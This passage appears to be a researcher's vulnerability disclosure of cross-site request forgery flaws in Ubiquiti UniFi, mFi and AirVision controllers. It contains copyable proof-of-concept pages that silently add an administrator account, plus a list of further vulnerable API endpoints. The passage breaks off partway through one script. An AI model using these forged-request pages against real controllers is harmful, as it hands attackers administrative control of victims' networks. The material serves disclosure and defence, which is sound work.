<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This screenshot shows the </span><span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">Settings >> System page <span style="color: red;">before</span> CSRF attack. (The victim Admin logged into Unifi Controller)</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="178" src="https://lh4.googleusercontent.com/jUQ5YRvJRPdgEedzXqoF_zaEne2nXRH3Ul9KKiFAIh8rZu0xcPdE7Gb-n7_869b6UMOgrxaWxncd0CHR8od0Vwk-LNA6u62W_jtQ1lBXMGzAFWV4ggZEuDrM7-A_z6fNfulA2q66Rrs" style="-webkit-transform: rotate(0rad); border: currentColor;" width="348" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The victim navigates to the attacker’s malicious page (page source shown for clarification):</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="454" src="https://lh5.googleusercontent.com/fM111S1PrLurkDHp53y-e8dhmCfD4UsMCPev34CTgpDsNb9OmUHHe9U8IicBcusrdYVp6uOxVmDp_hjsy9U8fohCPsJlNd_xXbEB0V12qXrclZBO71SmBAYiupVYz0Y2aVrSGP35v8g" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Copyable POC:</span><br />
<br />
<div style="background-color: #f8f8f8; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: 624px;">
<pre><span style="color: green; font-weight: bold;"><html></span>
<span style="color: green; font-weight: bold;"><head></span>
<span style="color: green; font-weight: bold;"><script></span>
<span style="color: #aa22ff; font-weight: bold;">function</span> sendCSRF()
{
<span style="color: #aa22ff; font-weight: bold;">var</span> url_base <span style="color: #666666;">=</span> <span style="color: #bb4444;">"https://192.168.0.106:8443/api/add/admin"</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> post_data<span style="color: #666666;">=</span><span style="color: #bb4444;">"%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> xmlhttp;
xmlhttp <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> XMLHttpRequest();
xmlhttp.open(<span style="color: #bb4444;">"POST"</span>, url_base, <span style="color: #aa22ff; font-weight: bold;">true</span>);
xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Accept"</span>,<span style="color: #bb4444;">"*/*"</span>);
xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Content-type"</span>,<span style="color: #bb4444;">"application/x-www-form-urlencoded; charset=UTF-8"</span>);
xmlhttp.withCredentials<span style="color: #666666;">=</span> <span style="color: #bb4444;">"true"</span>;
xmlhttp.send(post_data);
}
<span style="color: green; font-weight: bold;"></script></span>
<span style="color: green; font-weight: bold;"></head></span>
<span style="color: green; font-weight: bold;"><body></span>
<span style="color: green; font-weight: bold;"><h1></span>CSRF POC<span style="color: green; font-weight: bold;"></h1></span>
Sending CSRF Payload!!!
<span style="color: green; font-weight: bold;"><body</span> <span style="color: #bb4444;">onload="sendCSRF()"</span><span style="color: green; font-weight: bold;">></span>
<span style="color: green; font-weight: bold;"></body></span>
</pre>
<pre><span style="color: green; font-weight: bold;"></html></span></pre>
</div>
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Here is a proxy view from the perspective of the victim Admin</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.0791; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">First the admin’s browser goes to </span><a href="http://www.malicous-site.com/" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.malicious-site.com</span></a><span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;"> and pulls the attackers CSRF payload page</span></div>
</li>
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.0791; margin-bottom: 8pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">Then the admin’s browser loads the forged request that will add another admin on the UniFi Controller</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="209" src="https://lh3.googleusercontent.com/UpHcS2d8eYEwR-Z8g3MXPCDzZnVXJk63Gb3jErYMgqG8OY1qU6sEQt8zpDgZFkNIqBK1SyqeKiXKLXd1MscNStE1tTu5Zcaq7c_cDVYfsRwC1pV_V0zdXL2aXGM-98xNGmvgNusZEok" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The forged request is shown below. You can see that the Referer is </span><a href="http://www.malicious-site.com/csrf.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.malicious-site.com/csrf.html</span></a><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, and not the Unifi Controller. However, because of Same Origin Policy, when the admin makes the request to the Unifi Controller, the browser attaches the admin’s valid session cookie:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="468" src="https://lh6.googleusercontent.com/HGxNTcBJGzCAi5iMJummUiQOOyDslpr04HjB2q-PZ2AyYCOFGJFwXX2zNAq17Oi0ksVNlfS3o3kTOlPBidJNC4T3rW1ZIiASvAdRriJ_mTxPmXHQNjx9Dd-szAFDovXYbyr67LEPHrQ" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The response, showing the new admin was created successfully:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="378" src="https://lh6.googleusercontent.com/W-J5fo8FrYmu0SZiloFc9LtrslKpc8y7dLzAD6EovURMDu9j3RD79mdSkSpg-VX4JywX8InpkaY8y0XgKEKiHu3TXNdymb4w-UVN4bTRdU-HTLSgldZLa-EQfqEnppygsGqp8O2QVUU" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The next two screenshots show the attacker logging in after the attack:</span><br />
<br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="394" src="https://lh3.googleusercontent.com/scRbMdjw9Dz1IQjQ91gY8KwKuiUhswKBd-cA6GiYP0-8rf39GHWS7WBjQJJ00Ezr8R2VbMjeK-3EtxdVbU9J3LY18vWKrmFIu9t1qrlLFyiSwiG_8CkdRqgff-Hp3r3CoZZ_VJY36fI" style="-webkit-transform: rotate(0rad); border: currentColor;" width="534" /></span></div>
<br />
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System page </span><span style="color: red; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">after</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> the CSRF attack </span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="195" src="https://lh3.googleusercontent.com/Bt0Iaq2k-xo_4CmOQvzJVvRocmcnyr9lUElGISK0KrnXSQBC28GG5PPp_D8uD8_h1WyHOuKiLubEeRJZbSe_ZmwjG0E80YfrVx5uoWIl9hgKFeaB99Hi_Wb4JFmInME7aZf8XSfBq0s" style="-webkit-transform: rotate(0rad); border: currentColor;" width="504" /></span></div>
<br />
<br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The next POC is another example of how an attacker can use CSRF to update and enable the syslog server on the Unifi Controller. I was working on this one before I figured out that the /api/add/admin function existed:</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>CSRF POC #2 – Update syslog server</b></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System (Before CSRF attack)</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="517" src="https://lh4.googleusercontent.com/yWyRFTxp437AT1uPl6fPbGYeQzNY84shOgpnkKQ4dQ6bQ-UPJSZYzaQpWiHJn6H4-zNJVAJFoIffcuNhtdfy66ERK0mnUwuxqNTbndiG1h4YjaKxNuZau4ODqyVj--1fnnSEHUmwgLg" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">Here is the CSRF attack page on the attackers server:</span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="194" src="https://lh5.googleusercontent.com/7qA5Hkl8f-CCh6dUYpBurUNSJPWLC6qAB36CtT_ppMjxbrTSd8MhWIrsCrnBzrMM9YTiXz8z_I9XOVxDHnHMcZak0Sg9-fNre76v4nnZUCrk5ZIbH33J6BuFAmz_npazGWWfzIzohQk" style="-webkit-transform: rotate(0rad); border: currentColor;" width="552" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="298" src="https://lh3.googleusercontent.com/8gNDCJmKLZxvvoxIgGzdW2Ud8eWlY6l5mQYbFZsdslq-at95w0hAL9lWm7zjBdL38Cf-Dvdcm9al7O1TFzamAorKvyPzkCksutq1EpLiO6mn6vbDjPgSTkft5NIEjotpeERhA6AOjQY" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System (After CSRF attack)</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="460" src="https://lh6.googleusercontent.com/aJgmk5VxfWFTLkU2UZFG9LhH_CBTLFmlw3lFLmkB35KNhiulw3C0-5MoqM8w_MeQT7DCjOVZKT2P46ylmE6P77VjTOio9e2adqPWgtvVL0LmEXbyaT03GIByV3lORLQTE_nG2-yCHSM" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="161" src="https://lh6.googleusercontent.com/5e-PyyzGFpKUIXSeLLaT0covDRAW2h_B6XWhKhwIltjh6laCAt4lxF70dF2WBolCYaC6imYs_oWasxqmyWlDAkLrcI0ZVu9j23ogAtHNiC8XXRq2u936JUvwUM3xb9j1cJknhCd-bzc" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The forged request:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="304" src="https://lh5.googleusercontent.com/8ptTTGUlUjmdgZPrQyuGVgrf860zXmpVSyqsZavEZVt2rux3el5pAjQ5hjPnkrDdX3xaZm4xynNipENCFEKyxcNaODhhw49Og0NR5lWs0eBmcyrhUw0GjfaAwNGwBn39TpkLED8EZu4" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The response:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="207" src="https://lh3.googleusercontent.com/08VgpGkA730MTRwQ7k2wFSR1SyFEWbdKMFJx51FrpooRpBh4EvbABU4n-V0XiwFjcoLnXaYbk3xc2C5AKtIlAFPPCSOOJadrXlHKXWs-lvJqcET2pDLhWgwt7g6o4idYUfb44QkAKvc" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Syslog messages from AP (begin as soon as CSRF is executed)</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="111" src="https://lh6.googleusercontent.com/Sh6qWwTEo7gjhR9xIfODqvFlvFfwPoZAO9o2lXLnZ19-YU40f6XBZdJa_wqLLHPdbNy5-ftVmEEGk0o3ThAVdgNWS6fQrWRR89r2WtaKal05zPCNQKnsOc1VuSAeAZUPpNvAF4gntMw" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span><br /></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In addition to these POCs, any function that does not have a non-predictable nonce included, is vulnerable to CSRF. This includes:</span><br />
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/add/wlanconf</span><br />
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/set/setting/guest_access</span><span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Change almost anything on this page (guest password, authentication method, restricted subnets):</span><br />
</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="300" src="https://lh4.googleusercontent.com/50I-kdvgLSrfMYpKYxGeXWITJu_20-TtpkxIBCSEu76Z4jMo-RhdoFF2Esd99MsywSyPQGqO7ydSuf3R3MrlCS8RxWivbVFz34dW9R_VBPIyGrBCcfKT60wNro-DqlYNwg2S7I4RJmc" style="-webkit-transform: rotate(0rad); border: currentColor;" width="559" /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/cmd/stamgr</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Block users by MAC address</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Unblock users by MAC address</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Reconnect users by MAC address</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST api/set/setting/rsyslogd</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Configure the syslog server and port</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/set/setting/smtp</span><span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/cmd/cfgmgr</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Configure the syslog server, port, authentication settings</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/set/setting/identity</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Setting Name of Unifi Controller</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<h1 dir="ltr" style="line-height: 1.0791; margin-bottom: 0pt; margin-top: 12pt;">
<span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti - </span><span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; line-height: 1.0791; white-space: pre-wrap;">mFi Controller v2.0.15 - </span><span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; line-height: 1.0791; white-space: pre-wrap;">Cross-site Request Forgery (CSRF)</span></h1>
</div>
<div>
<span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; line-height: 1.0791; white-space: pre-wrap;"><br /></span></div>
<div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-352: </span><a href="http://cwe.mitre.org/data/definitions/352.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/352.html</span></a></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">While this walk through is not as complete as the previous one, this screenshot shows that the mFi Controller exhibits the same CSRF vulnerability. </span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="310" src="https://lh3.googleusercontent.com/g9DHE4Ky6yo7CJh-3rP1nB74lq-2eo7hiRF2Dyr9OZ2g1AufqMfH0LD8JugQQIGQWWRiGiZKxsv6S4KJbI4zPBHQ4NAUCUReSwIlzi3lNJIYmi5aob4K6-b4Oh-v7Y_FnIwHPGQ46oM" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span><br />
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Copyable POC:</span><br />
<br />
<div style="background-color: #f8f8f8; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: 624px;">
<pre><span style="color: green; font-weight: bold;"><html></span>
<span style="color: green; font-weight: bold;"><head></span>
<span style="color: green; font-weight: bold;"><script></span>
<span style="color: #aa22ff; font-weight: bold;">function</span> sendCSRF()
{
<span style="color: #aa22ff; font-weight: bold;">var</span> url_base <span style="color: #666666;">=</span> <span style="color: #bb4444;">"https://192.168.0.106:6443/api/v1.0/add/admin"</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> post_data<span style="color: #666666;">=</span><span style="color: #bb4444;">"%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> xmlhttp;
xmlhttp <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> XMLHttpRequest();
xmlhttp.open(<span style="color: #bb4444;">"POST"</span>, url_base, <span style="color: #aa22ff; font-weight: bold;">true</span>);
xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Accept"</span>,<span style="color: #bb4444;">"*/*"</span>);
xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Content-type"</span>,<span style="color: #bb4444;">"application/x-www-form-urlencoded; charset=UTF-8"</span>);
xmlhttp.withCredentials<span style="color: #666666;">=</span> <span style="color: #bb4444;">"true"</span>;
xmlhttp.send(post_data);
}
<span style="color: green; font-weight: bold;"></script></span>
<span style="color: green; font-weight: bold;"></head></span>
<span style="color: green; font-weight: bold;"><body></span>
<span style="color: green; font-weight: bold;"><h1></span>CSRF POC<span style="color: green; font-weight: bold;"></h1></span>
Sending CSRF Payload!!!
<span style="color: green; font-weight: bold;"><body</span> <span style="color: #bb4444;">onload="sendCSRF()"</span><span style="color: green; font-weight: bold;">></span>
<span style="color: green; font-weight: bold;"></body></span>
</pre>
<pre><span style="color: green; font-weight: bold;"></html></span></pre>
</div>
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
<div>
<h1 dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="color: #2e74b5; font-family: Calibri; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti - AirVision Controller v2.1.3 - Cross-site Request Forgery (CSRF)</span></h1>
</div>
<div>
<br /></div>
<div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-352: </span><a href="http://cwe.mitre.org/data/definitions/352.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/352.html</span></a></div>
<br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 15px; white-space: pre-wrap;">I will also use the same POC for the AirVision controller. </span></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>CSRF POC #1– Add Admin</b></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System (Before CSRF attack) (The victim "Seth" logged into AirVision Controller)</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="344" src="https://lh3.googleusercontent.com/cBHOI5O2jGU1FBKxJGuhvBkmebY75QtTWJGGUjkjcM7Rp_xCZJUm1I1mWO8lL0s2L_HMqH-BSmn79r__j9hkt8FpnDIrWeq8Tn4wbFEEWDaogQU35QW5-IIMV7e-TMafHHT3kPET8no" style="-webkit-transform: rotate(0rad); border: currentColor;" width="525" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The victim navigates to the attacker’s malicious page (page source shown for clarification):</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="574" src="https://lh5.googleusercontent.com/G4NNI6HmOKJkxEdAYDbSzKNNNPCsllgBfyTO1bKDW5q1RtPQXqWhU0921xaRN6QebHLjxUdOu5EyY-DPtpM7iwWdqlLw5Gt2cB5goQr8-iDLqPyHD_EmAInuy7Mx4PdN5Qg7Maikv0M" style="-webkit-transform: rotate(0rad); border: currentColor;" width="561" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">Copyable POC:</span><br />
<br />
<div style="background-color: #f8f8f8; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: 624px;">
<pre><span style="color: green; font-weight: bold;"><html></span>
<span style="color: green; font-weight: bold;"><head></span>
<span style="color: green; font-weight: bold;"><script></span>
<span style="color: #aa22ff; font-weight: bold;">function</span> sendCSRF()
{
<span style="color: #aa22ff; font-weight: bold;">var</span> url_base <span style="color: #666666;">=</span> <span style="color: #bb4444;">"https://192.168.0.106:7443/api/v2.0/admin"</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> post_data<span style="color: #666666;">=</span><span style="color: #bb4444;">"{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”</span>
<span style="color: #bb4444;">var xmlhttp;</span>
<span style="color: #bb4444;">xmlhttp = new XMLHttpRequest();</span>
<span style="color: #bb4444;">xmlhttp.open("</span>POST<span style="color: #bb4444;">", url_base, true);</span>
<span style="color: #bb4444;">xmlhttp.setRequestHeader("</span>Accept<span style="color: #bb4444;">","</span><span style="color: #666666;">*</span><span style="border: 1px solid rgb(255, 0, 0);">/*");</span>
xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Content-type"</span>,<span style="color: #bb4444;">"application/plain; charset=UTF-8"</span>);
